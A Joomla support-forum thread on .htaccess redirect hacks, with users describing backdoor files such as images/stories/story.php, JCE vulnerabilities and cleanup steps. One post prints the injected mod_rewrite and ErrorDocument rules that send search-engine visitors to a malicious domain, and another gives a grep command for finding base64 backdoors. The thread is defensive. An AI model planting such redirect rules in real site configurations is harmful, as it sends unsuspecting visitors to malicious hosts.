Joomla .htaccess hacked to xxx.ru
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 26
- Joined: Mon Sep 11, 2006 2:23 pm
- Location: Argentina
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
Hi: this post had been really useful to me, I had removed the hack using the list of thing to check, by PhilD.
In my case, I don’t know how the infection began, but it is possible that it was to a poor admin password. When you install Joomla for the first time, it asks for an administrator username and pass, and lot of people just type admin in both cases. Any simple script that uses brute force methods to enter the administrator can try using that easy passwords and enter really easily.
So these are my suggestions...
1- Never user easy to guess passwords, even in testing sites, or provisory installations;
2- If you ever need to see the changes on a site but your ISP (company used to login to Internet) has a cache so your ISP cache is not cleaned, you can always surf anonymously using tools like... anonymouse.org so you can see how the rest of the world is seeing your site;
3- if you want to check if there are other files infected on your server, and you have root access, you can use PUTTY and enter via SSH to your server (Linux) and type this line...
find /home -type f -iname "*.php" -print0 | xargs -0 egrep 'gzuncompress\(base64_decode'
This will check on every file to see if the hacked code is still there.
If you need anything else you are always free to post questions here or contacting me...
In my case, I don’t know how the infection began, but it is possible that it was to a poor admin password. When you install Joomla for the first time, it asks for an administrator username and pass, and lot of people just type admin in both cases. Any simple script that uses brute force methods to enter the administrator can try using that easy passwords and enter really easily.
So these are my suggestions...
1- Never user easy to guess passwords, even in testing sites, or provisory installations;
2- If you ever need to see the changes on a site but your ISP (company used to login to Internet) has a cache so your ISP cache is not cleaned, you can always surf anonymously using tools like... anonymouse.org so you can see how the rest of the world is seeing your site;
3- if you want to check if there are other files infected on your server, and you have root access, you can use PUTTY and enter via SSH to your server (Linux) and type this line...
find /home -type f -iname "*.php" -print0 | xargs -0 egrep 'gzuncompress\(base64_decode'
This will check on every file to see if the hacked code is still there.
If you need anything else you are always free to post questions here or contacting me...
-
- Joomla! Fledgling
- Posts: 1
- Joined: Fri Aug 03, 2012 8:50 pm
Re: Joomla .htaccess hacked to xxx.ru
I tried a few things like updating to 1.5.26 but the .htaccess files kept reappearing.
I used Cpanel's Virus Scanner and it found the file images/stories/story.php
I removed it and it worked for me.
No more htaccess files appeared.
I used Cpanel's Virus Scanner and it found the file images/stories/story.php
I removed it and it worked for me.
No more htaccess files appeared.
- HackRepair
- Joomla! Apprentice
- Posts: 17
- Joined: Wed Apr 25, 2012 10:52 pm
- Location: San Diego
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
Though if you've found a hacked file within your account you should assume the entire account has been compromised and take action accordingly.
The thief is likely still hiding in your closet.
The thief is likely still hiding in your closet.
- pe7er
- Joomla! Master
- Posts: 24934
- Joined: Thu Aug 18, 2005 8:55 pm
- Location: Nijmegen, Netherlands
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
Make sure that all your 3rd party extensions are up to date!gaudigabriels wrote:I tried a few things like updating to 1.5.26 but the .htaccess files kept reappearing.
I used Cpanel's Virus Scanner and it found the file images/stories/story.php
I removed it and it worked for me.
Last week I solved the same problem with unwanted redirections for a new customer.
It contained a couple of .htaccess files with redirects to other websites, and also /images/stories/story.php
At their site it was caused by an old not-updated version of JCE editor which contained a insecurity.
Which has been solved in the most recent JCE versions.
Kind Regards,
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
Deleting all folders/files is the only sure way to get rid of it.gaudigabriels wrote:I tried a few things like updating to 1.5.26 but the .htaccess files kept reappearing.
I used Cpanel's Virus Scanner and it found the file images/stories/story.php
I removed it and it worked for me.
No more htaccess files appeared.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- Slackervaara
- Joomla! Ace
- Posts: 1115
- Joined: Sat Aug 13, 2011 6:27 am
Re: Joomla .htaccess hacked to xxx.ru
Did you look when story.php was modified? It can get you information, when the hack was made. In addition you could look in access logs that time and find out how the hack was made. You will also get the hackers ip-adress and then you can check what else he has done on your site. You can also ban the hackers ip-address in your .htaccess and report abuse to his ISP.
-
- Joomla! Apprentice
- Posts: 14
- Joined: Sat Jul 05, 2008 7:14 pm
Re: Joomla .htaccess hacked to xxx.ru
HI, i just want to say thanx to BernardT, using his script i managed to detect backdoor file on my server. It was hidden in images/stories/ folder in two files:
story.php and cache_uthqek.php
my htaccess file was reinfecting every 45mins, after deleting this two files htaccess remains clean.
I believe i got infected due to old version of joomla, or old JCE editor plugin, now i updated both of them. I was fightin against this malware near 3 days, and while i was fighting i was changing back to normal my htaccess file just not to get on list of malicious sites on google and other sites. later i made cronjob that copies clean htaccess file very minute, that gave me time to search for backdoor and to be clean in eyes of visitors nad browsers.
story.php and cache_uthqek.php
my htaccess file was reinfecting every 45mins, after deleting this two files htaccess remains clean.
I believe i got infected due to old version of joomla, or old JCE editor plugin, now i updated both of them. I was fightin against this malware near 3 days, and while i was fighting i was changing back to normal my htaccess file just not to get on list of malicious sites on google and other sites. later i made cronjob that copies clean htaccess file very minute, that gave me time to search for backdoor and to be clean in eyes of visitors nad browsers.
-
- Joomla! Fledgling
- Posts: 1
- Joined: Sat Aug 18, 2012 11:29 am
Re: Joomla .htaccess hacked to xxx.ru
In every case of this hack that I cleaned up so far there was a hidden script in images/stories/ called something like .cache_i24tgg.php. That is also part of this hack. Delete that script, story.php and all .htaccess files and update Joomla to your most recent version.
To deploy the scripts an exploit for JCE is being used. The vulnerability has been patched on 29 August 2011 and updating Joomla to a release after that will fix it. Alternatively you can just patch JCE using the vendor supplied patch at http://www.joomlacontenteditor.net/news ... 1-released.
Hope this helps some of you!
To deploy the scripts an exploit for JCE is being used. The vulnerability has been patched on 29 August 2011 and updating Joomla to a release after that will fix it. Alternatively you can just patch JCE using the vendor supplied patch at http://www.joomlacontenteditor.net/news ... 1-released.
Hope this helps some of you!
-
- Joomla! Fledgling
- Posts: 1
- Joined: Tue Aug 21, 2012 1:53 am
Re: Joomla .htaccess hacked to xxx.ru
I got this too! After clearing cache within Joomla control panel, I still have a file called "cache_inelin.php" under the folder "tmp". Inside of this file there's a suspicious line:
$icon = preg_replace('#\.[^.]*$#', '', $icon);
The virus stop rewriting .htacess after removing this file.
Anybody know where is the security hole in addition to JCE?
$icon = preg_replace('#\.[^.]*$#', '', $icon);
The virus stop rewriting .htacess after removing this file.
Anybody know where is the security hole in addition to JCE?
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
If you have an old version of NoNumber extensions you need to update it http://www.nonumber.nl/news/releases/28 ... extensions
and check the vulnerable extensions list also. http://docs.joomla.org/Vulnerable_Extensions_List
Make sure all your extensions are the latest versions.
and check the vulnerable extensions list also. http://docs.joomla.org/Vulnerable_Extensions_List
Make sure all your extensions are the latest versions.
-
- Joomla! Apprentice
- Posts: 26
- Joined: Sat Aug 20, 2005 1:36 pm
- Location: Norway
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
I have also had this on serveral Joomla! sites on different servers. On all of these, the JCE was old. In all cases it was a file called story.php under /images/stories. It was also other infected files but the story.php was common for all. On the latest hack, the file was renamed to story.gif.
-
- Joomla! Apprentice
- Posts: 9
- Joined: Tue Feb 23, 2010 3:36 am
- Location: Melbourne VIC Aust.
- Contact:
htaccess Redirect Attack
Hi,
In the last week or so my site at http://www.rinet.com .au has been attacked somehow.
The result is that the .htaccess file has been modified with
... and ...
after the legitimate htaccess data.
There are lots of spaces in front to try and hide what the hacker is doing.
When finished it modifies the .htaccess to permissions 444 removing the owner write access to make editing the file back again just a little bit annoying.
The net effect is when some images are requested they get a "301 Moved Permanently" error being redirected to places such as:
http://phonesthoughuploader .info
http://imagesworsetightened .info
http://midaugustoperations .pro
and the latest one is http://gdrivedownuntil .pro
The new destinations seem to be dead.
I have tried restoring an old backup but the problem is still there.
Users of phpBB have reported the same issue.
Any help would be much appreciated.
Thanks.
Any help
In the last week or so my site at http://www.rinet.com .au has been attacked somehow.
The result is that the .htaccess file has been modified with
Code: Select all
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|wikipedia|qq|excite|alaarchiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-land|browseireland|finditireland|iesearch|ireland-ikz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
</IfModule>
Code: Select all
ErrorDocument 500 http://gdrivedownuntil. pro/creation?8
after the legitimate htaccess data.
There are lots of spaces in front to try and hide what the hacker is doing.
When finished it modifies the .htaccess to permissions 444 removing the owner write access to make editing the file back again just a little bit annoying.
The net effect is when some images are requested they get a "301 Moved Permanently" error being redirected to places such as:
http://phonesthoughuploader .info
http://imagesworsetightened .info
http://midaugustoperations .pro
and the latest one is http://gdrivedownuntil .pro
The new destinations seem to be dead.
I have tried restoring an old backup but the problem is still there.
Users of phpBB have reported the same issue.
Any help would be much appreciated.
Thanks.
Any help
Last edited by mandville on Tue Aug 28, 2012 1:52 pm, edited 1 time in total.
Reason: broke links for securfity reasons, trimmed code. moved from 2.5 to 1.5
Reason: broke links for securfity reasons, trimmed code. moved from 2.5 to 1.5
-
- Joomla! Apprentice
- Posts: 9
- Joined: Tue Feb 23, 2010 3:36 am
- Location: Melbourne VIC Aust.
- Contact:
Re: htaccess Redirect Attack
Should have mentioned I am running Joomla! 1.5.26 ... and I've put in the wrong forum, sorry.
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess Redirect Attack
this topic is highly relevant http://forum.joomla.org/viewtopic.php?f=432&t=705216
when/if you respond i will merge with the associated topic
and what are phpbb doing about this hack?Users of phpBB have reported the same issue.
when/if you respond i will merge with the associated topic
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- wernejo
- Joomla! Enthusiast
- Posts: 231
- Joined: Sun Jun 17, 2007 9:17 am
- Location: Australia
- Contact:
Re: htaccess Redirect Attack
you got hacked as well?
one of my websites has been hit the same way. i have just deleted the current website and uploaded a back up but nothing has changed.
i noticed that a bunch of .htaccess files had been scattered around the main directories but i still deleted everything but the configuration.php
this is also the second website in the last week that hacked in the a similar way over the last week.
the last website was easily fixed after the backup was uploaded.
any advice?
one of my websites has been hit the same way. i have just deleted the current website and uploaded a back up but nothing has changed.
i noticed that a bunch of .htaccess files had been scattered around the main directories but i still deleted everything but the configuration.php
this is also the second website in the last week that hacked in the a similar way over the last week.
the last website was easily fixed after the backup was uploaded.
any advice?
-
- Joomla! Apprentice
- Posts: 9
- Joined: Tue Feb 23, 2010 3:36 am
- Location: Melbourne VIC Aust.
- Contact:
Re: htaccess Redirect Attack
I too tried restoring from Akeebra backup but the problem came back.
Next I followed the advice given elsewhere in the forum of blowing away all folders, keeping only the images and templates folders on your PC. Then I did a clean install using the full 1.5.26 package.
Deleted the installation folder, copy configuration.php back up to the root folder. Then restore your additional images, checking each file for malicious code (inspect it in a binary viewer). Then restore your template folder (additional template only) checking each file for malicious code again.
You are basically leaving the database intact but in removing all folders malicious files get deleted as well :-)
I found the best thing for additional modules etc is to uninstall them before deleting your site. I found overwriting with a fresh install didn't work too well for some modules/plugins.
So far my site seems to be OK.
Next I followed the advice given elsewhere in the forum of blowing away all folders, keeping only the images and templates folders on your PC. Then I did a clean install using the full 1.5.26 package.
Deleted the installation folder, copy configuration.php back up to the root folder. Then restore your additional images, checking each file for malicious code (inspect it in a binary viewer). Then restore your template folder (additional template only) checking each file for malicious code again.
You are basically leaving the database intact but in removing all folders malicious files get deleted as well :-)
I found the best thing for additional modules etc is to uninstall them before deleting your site. I found overwriting with a fresh install didn't work too well for some modules/plugins.
So far my site seems to be OK.
- wernejo
- Joomla! Enthusiast
- Posts: 231
- Joined: Sun Jun 17, 2007 9:17 am
- Location: Australia
- Contact:
Re: htaccess Redirect Attack
glenn3095 wrote:I too tried restoring from Akeebra backup but the problem came back.
Next I followed the advice given elsewhere in the forum of blowing away all folders, keeping only the images and templates folders on your PC. Then I did a clean install using the full 1.5.26 package.
Deleted the installation folder, copy configuration.php back up to the root folder. Then restore your additional images, checking each file for malicious code (inspect it in a binary viewer). Then restore your template folder (additional template only) checking each file for malicious code again.
You are basically leaving the database intact but in removing all folders malicious files get deleted as well :-)
I found the best thing for additional modules etc is to uninstall them before deleting your site. I found overwriting with a fresh install didn't work too well for some modules/plugins.
So far my site seems to be OK.
i've just had our 3rd website hacked in this same manner.
the method i have used so far is download a copy of the templates css, html, and images folders and files, then do the same for the images in the stories file and then do the same for any other folder that is part of an extension that's been installed. i also grabed a copy of any other important files except for any .htaccess files i found.
because the database is fine, all you need to do is delete the current site and all the files then upload a backup and restore any key files such as the template, images, and extensions you have installed.
you need to remove all of the core files that was on the server when it got hacked or it will not go away.
it will also take a little while for google to check your site again so dont panic.
- Digital Island
- Joomla! Apprentice
- Posts: 39
- Joined: Thu Mar 08, 2007 1:17 am
- Contact:
Re: .htaccess Redirect Hack
Excellent post serve me as a life saver, but also this is extended to all that in good faith helped me to analyze (still doing it) and solve the issue. (I am also considering to thank to the one that compromised my security because he obliged me to learn, but not sure :-)PhilD wrote: Because this code can be within almost any file within a site and it is recommended that one follow the points below. Only by doing this can one be assured the code is truly removed form the site.
[/b]
For the records, I got compromised affecting some Joomla and WP (Can I mention it?:-) solve it here because it happen trough Joomla. For any one else coming to this post just follow PhilD instructions but worth to read all.
Now I learn I need to review more frequently the Joomla! Documentation - Vulnerable Extensions List http://feeds.joomla.org/JoomlaSecurityV ... Extensions and this security forum.
I love Joomla but Joomla community makes me love it more.
"We do not have to visit a madhouse to find disordered minds; our planet is the mental institution of the universe.”
-
- Joomla! Explorer
- Posts: 377
- Joined: Wed May 30, 2007 7:55 am
Re: Joomla .htaccess hacked to xxx.ru
Yeah, I think this is worldwide attack on the 1.5 versions. I would suggest the security team check this because I had this attack about 2 weeks ago and it whacked all my 1.5 sites on a single server. Here's my post of the incident. http://forum.joomla.org/viewtopic.php?f=432&t=749242
Although I do and always appreciate the support from Joomla!, I ran the the FPA as suggested and unfortunately didn't find jack.! So I had to inspect the server logs for unusual activity and found a backdoor file installed withing the images folder. I took it out and the attack was gone. I then installed an unhacked backup and changed all passwords (backend, FTP, Hosting, DB, everything!)... even installed a firewall on my sites just to be safe from now on.
Although I do and always appreciate the support from Joomla!, I ran the the FPA as suggested and unfortunately didn't find jack.! So I had to inspect the server logs for unusual activity and found a backdoor file installed withing the images folder. I took it out and the attack was gone. I then installed an unhacked backup and changed all passwords (backend, FTP, Hosting, DB, everything!)... even installed a firewall on my sites just to be safe from now on.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
@crazydriver
What version(s) of 1.5 were you running ?
Posting the FPA outputs for (your sites) on here would help locate the error.
Unless you post the FPA results on here we have no way of ascertaining the accuracy of your conclusion.
What version(s) of 1.5 were you running ?
Posting the FPA outputs for (your sites) on here would help locate the error.
Unless you post the FPA results on here we have no way of ascertaining the accuracy of your conclusion.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Explorer
- Posts: 377
- Joined: Wed May 30, 2007 7:55 am
Re: Joomla .htaccess hacked to xxx.ru
Hello Webdongle,@crazydriver
What version(s) of 1.5 were you running ?
Posting the FPA outputs for (your sites) on here would help locate the error.
Unless you post the FPA results on here we have no way of ascertaining the accuracy of your conclusion.
Did you see the post I made about my hack incident? The FPA is in it the link I posted. Here's the link of the thread I made. http://forum.joomla.org/viewtopic.php?f=432&t=749242
Actually to be exact here: http://forum.joomla.org/viewtopic.php?f ... 2#p2887684
Unfortunately, I didn't get a response relating to what was wrong in the report. I ran the FPA on a hacked site and I posted it in the link above. I also got many useful advice from other users on the forum who also had the same or similar problem. However grateful, there was no real fix and the .htaccess kept changing on its own every 30 minutes to an hour despite uploading an unhacked .htaccess file.
I fixed my problem by looking at my server logs to pinpoint what was changing my .htaccess. There was unusual activity going to a malicious file in images/stories/banners. I erased it and installed an unhacked backup. I also installed a firewall on to my sites. I then waited for another attack but it never happened. I guess that solved it.
If you got a better solution, I'm all ears.
Thank you for your time on this matter.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
Not got a better solution than that posted by mandville. Am looking to see if I can help you locate the point of entry so as to help you prevent it happening again.
That FPA output is for one of your sites ... you said you have more than one.
Are all your sites 1.5.26 ?
Have not got the time to check all the myriad of extensions(you have installed) with the VEL. Or to check if they are up to date. Have you meticulously checked each and everyone was up to date before the hack ?
I can see you like custom Templates ... where do you download them from ?
Have all the computers that have server/ftp/admin access been check for Trojans ?
Is it a shared Hosting package ?(it could have spread from another site on shared Hosting).
Who is your Host ?
That FPA output is for one of your sites ... you said you have more than one.
Are all your sites 1.5.26 ?
Have not got the time to check all the myriad of extensions(you have installed) with the VEL. Or to check if they are up to date. Have you meticulously checked each and everyone was up to date before the hack ?
I can see you like custom Templates ... where do you download them from ?
Have all the computers that have server/ftp/admin access been check for Trojans ?
Is it a shared Hosting package ?(it could have spread from another site on shared Hosting).
Who is your Host ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Explorer
- Posts: 377
- Joined: Wed May 30, 2007 7:55 am
Re: Joomla .htaccess hacked to xxx.ru
Thanks for the reply.
All sites are 1.5.26. They were all updated soon after the security notice.
For the templates, I'm an RT member so straight from the club site.
As with the trojans, I have ran Avast and malware and found nothing.
I use several shared servers for my websites but just one was affected. Only sites within that attacked server was affected.
All sites are 1.5.26. They were all updated soon after the security notice.
For the templates, I'm an RT member so straight from the club site.
As with the trojans, I have ran Avast and malware and found nothing.
I use several shared servers for my websites but just one was affected. Only sites within that attacked server was affected.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
Some sites were infected in November but not noticed until recently. There is a possibility that one of the 1.5.25 sites was infected before the update came out. Updating prevents sites being infected but does not eradicate an exploit that already exists. Unfortunately (often) the exploit has to be in the 'wild' before a fix for it can be made. Did you make a note of the 'last modified date' of .htaccess (or other infected files) ? That would give you a date the exploit started to take effect but (sadly) not the date it entered the server.crazydiver wrote:...
All sites are 1.5.26. They were all updated soon after the security notice.
...
If the exploit entered the server before the patch was released then any infected browser visiting the site could have infected the server. Otherwise is your computer the only one that has ftp, server or Admin access ?crazydiver wrote:....
As with the trojans, I have ran Avast and malware and found nothing.
....
Have you inspected the logs from that server ? It could provide info on how and when the exploit entered the server.crazydiver wrote:...
I use several shared servers for my websites but just one was affected. Only sites within that attacked server was affected.
If you deleted everything on the server and rebuilt as per the official advise(posted by mandville) ... and nothing is amiss now ... then it is likely that the exploit entered before the patch was produced ? Only examination of the server logs will confirm if the exploit entered before or after the update to 1.5.26.
Because viruses, exploits, etc. are often out in the wild before a remedy is produced is the main reason why deleting of ALL the files on the server is recommended. Because the exploit can be in backed up files of the site.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- Tomoe
- Joomla! Apprentice
- Posts: 48
- Joined: Tue Sep 16, 2008 3:49 pm
Re: Joomla .htaccess hacked to xxx.ru
What a nightmare ! On the server, I have one real site and test sites. Among them, 1.5 site and even 1.7 site. Of course, after testing, I didn't made any upgrade or deleted this sites. Fatal error. Everything is infected. I cleared .htaccess problem, no more redirection, but there's still iframes in all pages of all sites. I deleted old sites, but now I have to clean and restore the site and a test site I was working on.
Thus, I have some questions.
1/ Is the database safe in spite of this attack ?
2/ Is there any risk of corruption of images ? Not unknown images but images clearly identified with my own regular names.
3/ Do I have to erase files and folders not linked with Joomla ? I'm afraid the answer is "yes"...
4/ What is the safer way to backup templates and overrides ?
5/ Is there any risk using the backoffice ?
Thanks for your help.
Thus, I have some questions.
1/ Is the database safe in spite of this attack ?
2/ Is there any risk of corruption of images ? Not unknown images but images clearly identified with my own regular names.
3/ Do I have to erase files and folders not linked with Joomla ? I'm afraid the answer is "yes"...
4/ What is the safer way to backup templates and overrides ?
5/ Is there any risk using the backoffice ?
Thanks for your help.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
Tomoe wrote:...
Thus, I have some questions.
1/ Is the database safe in spite of this attack ?
2/ Is there any risk of corruption of images ? Not unknown images but images clearly identified with my own regular names.
3/ Do I have to erase files and folders not linked with Joomla ? I'm afraid the answer is "yes"...
4/ What is the safer way to backup templates and overrides ?
5/ Is there any risk using the backoffice ?
Thanks for your help.
- Probably please seeBefore you post please read this
- Yes ... best to replace those with the originals
- Correct all folders/files
- http://extensions.joomla.org/extensions ... ackup/1606 is good to backup the whole site. But be aware that the hack can exist for several months before it is discovered. So your backups may contain hacked files.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- Tomoe
- Joomla! Apprentice
- Posts: 48
- Joined: Tue Sep 16, 2008 3:49 pm
Re: Joomla .htaccess hacked to xxx.ru
Thanks Webdongle.Webdongle wrote:
- Probably please seeBefore you post please read this
- Yes ... best to replace those with the originals
- Correct all folders/files
- http://extensions.joomla.org/extensions ... ackup/1606 is good to backup the whole site. But be aware that the hack can exist for several months before it is discovered. So your backups may contain hacked files.
- Read, but I confess I don't know how to complete some points.
- Problem : there's auto-generated images in several sizes. So, if I don't download it, there will be some recognition problem.
- Nightmare...
- Excuse me, I think I mistaked in my question. Thing is not using or not using Akeeba (very good component, by the way), it's the opportunity to download template files. Because there is differences I can't explain clearly beetween local site and online site. Problem is that local site is on a previous version of Joomla! (site takes time to be built).
- Rephrasing the question : will it getting worse if I use the backend to see or modify some settings ?
- muddauber
- Joomla! Ace
- Posts: 1618
- Joined: Thu Jun 08, 2006 11:26 pm
Re: Joomla .htaccess hacked to xxx.ru
I know several people said that it is unlikely the database is altered, but I would
strongly recommend you check to see all the users in the database via
PhpAdmin. I have found an extra admin on several hacked sites.
Another tip is to use the IP address of account to access site during troubleshooting,
this can bring up server and network caching issues. Also, your browser needs to
have caching disabled, or you'll be going in circles during this whole process.
Regarding your host, run, don't walk, away from them as fast as you can.
Since you said your Joomla and HTML sites have been hacked it is more
likely a shared server intrusion where they could get to all your directories.
If they get into your sites and directories, sometimes they'll start working
some additional hacks, including embedding scripts in your template
files.
strongly recommend you check to see all the users in the database via
PhpAdmin. I have found an extra admin on several hacked sites.
Another tip is to use the IP address of account to access site during troubleshooting,
this can bring up server and network caching issues. Also, your browser needs to
have caching disabled, or you'll be going in circles during this whole process.
Regarding your host, run, don't walk, away from them as fast as you can.
Since you said your Joomla and HTML sites have been hacked it is more
likely a shared server intrusion where they could get to all your directories.
If they get into your sites and directories, sometimes they'll start working
some additional hacks, including embedding scripts in your template
files.
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
the comment should have been more clear. Always check for users that don't belong. Extra admins are common and there are a number of ways to check for them. Use whatever method your comfortable with, but do check them.
What is meant by the general comment though is that the articles etc. are seldom altered in such a way to effect a hack and thus it is generally ok to reuse the database.
htaccess hacks can affect your entire domain. does not matter if your site is a cms site, a forum, or a plain html site, any and all can be affected. they do not necessarily affect other sites on the same server as the files that cause the hack are normally local to one or more sites within the domain or master account you have. There are also hidden files that reside outside of your public_html area that will copy the bad htaccess code back into any htaccess found in the public_html area of your domain. These must also be removed.
What is meant by the general comment though is that the articles etc. are seldom altered in such a way to effect a hack and thus it is generally ok to reuse the database.
htaccess hacks can affect your entire domain. does not matter if your site is a cms site, a forum, or a plain html site, any and all can be affected. they do not necessarily affect other sites on the same server as the files that cause the hack are normally local to one or more sites within the domain or master account you have. There are also hidden files that reside outside of your public_html area that will copy the bad htaccess code back into any htaccess found in the public_html area of your domain. These must also be removed.
PhilD
-
- Joomla! Apprentice
- Posts: 7
- Joined: Sat Jul 20, 2013 9:28 am
Re: Joomla .htaccess hacked to xxx.ru
I found very good tool for free online scanning for joomla website. Hacking and malware attacks are common problem for Joomla based sites. I scan my website in [removed]. It helps me every time diagnosing effected file. I replace those affected file and site display without any trouble. Let me know if it's helpful for you anyhow.
Last edited by mandville on Sat Jul 20, 2013 10:32 am, edited 1 time in total.
Reason: removed link to self promotional site.
Reason: removed link to self promotional site.